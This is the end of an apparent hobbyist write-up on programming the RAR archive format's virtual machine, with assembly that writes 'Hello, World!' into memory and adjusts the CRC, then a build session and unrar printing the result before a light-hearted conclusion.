    mov     [r3+#4],  #0x0a414141        ; Padding for compensation
    mov     [r3+#8],  #0x6c6c6548        ; 'lleH'
    mov     [r3+#12], #0x57202c6f        ; 'W ,o'
    mov     [r3+#16], #0x646c726f        ; 'dlro'
    mov     [r3+#20], #0x00000a21        ; '!\n'
    mov     [VMADDR_NEWBLOCKPOS],  #0x00001000
    mov     [VMADDR_NEWBLOCKSIZE], #22

    ; Compensate to required CRC
    push    RAR_FILECRC
    push    [VMADDR_NEWBLOCKSIZE]
    push    [VMADDR_NEWBLOCKPOS]
    call    $_compensate_crc
    test    r0, r0
    jz      $finished
    call    $_error

finished:
    call    $_success
$ make sample.rar
cpp -Istdlib < sample.rs > sample.ri
./raras -o sample.ro sample.ri
./rarld sample.ro > sample.rar
rm sample.ri sample.ro
$ unrar p -idq sample.rar 
AAc��!A
Hello, World!





Conclusion.

This is all pretty useless, but that's what makes it fun :-)